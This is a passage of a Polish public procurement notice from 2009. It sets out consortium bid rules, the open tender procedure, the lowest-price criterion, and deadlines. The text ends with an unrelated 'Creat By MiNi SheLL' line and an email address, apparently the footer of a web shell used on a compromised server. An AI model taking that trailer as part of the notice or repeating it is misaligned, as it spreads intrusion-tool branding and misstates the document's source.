5. Postanowienia w przypadku wniesienia oferty wspólnej przez dwóch lub więcej Wykonawców, o których mowa w art. 23 ustawy Prawo zamówień publicznych. 
1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
2) Pełnomocnictwo do pełnienia takiej funkcji, wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców winno być dołączone do oferty. 
3) Zgodnie z art. 141 ustawy Prawo zamówień publicznych Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. 
4) Każdy dokument, będący załącznikiem do oferty powinien być podpisany przez ustanowionego pełnomocnika. Dokumenty składane oddzielnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powinny być podpisane przez osobę (osoby) uprawnione do reprezentowania Wykonawcy, od którego pochodzą te dokumenty oraz przez pełnomocnika. 
5) Oferta winna być sporządzona wg następujących zasad: 
a) formularz oferty i załączniki Nr 1, 11, 12, 13 Wykonawcy występujący wspólnie składają jako jeden łączny, 
b) pozostałe załączniki do oferty tj. 2, 3, 4, 5, 6 winny pochodzić od każdego z podmiotów oddzielnie, 
c) załączniki Nr 7, 8, 9, 10: Ponieważ oceniany będzie łączny potencjał kadrowy i kwalifikacje, łączne doświadczenie wspólnie ubiegających się o udzielenie zamówienia Wykonawców, nie jest wymagane złożenie w/w dokumentów przez wszystkich Wykonawców, lecz dokumenty te mają obowiązek złożyć ten lub ci z wykonawców, którzy w imieniu wszystkich wykażą spełnienie tego warunku. 
6) W przypadku złożenia wadium w formie gwarancji ubezpieczeniowych lub bankowych jako zobowiązany powinni być wymienieni: wszyscy Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia, bądź: Pełnomocnik (Lider), ale pod warunkiem, że w gwarancji będzie zapis: Pełnomocnik (Lider): (nazwa wykonawcy) konsorcjum, które tworzą następujący Wykonawcy: (wymienieni wszyscy Wykonawcy)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzmiuw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PZMiUW Rzeszów, ul. Hetmańska 9 - pok. 122 - odbiór osobisty lub przesłanie pocztą - za odpłatnością 360 zł (z VAT)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2009 godzina 08:30, miejsce: Siedziba Zamawiającego - pok. 222 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com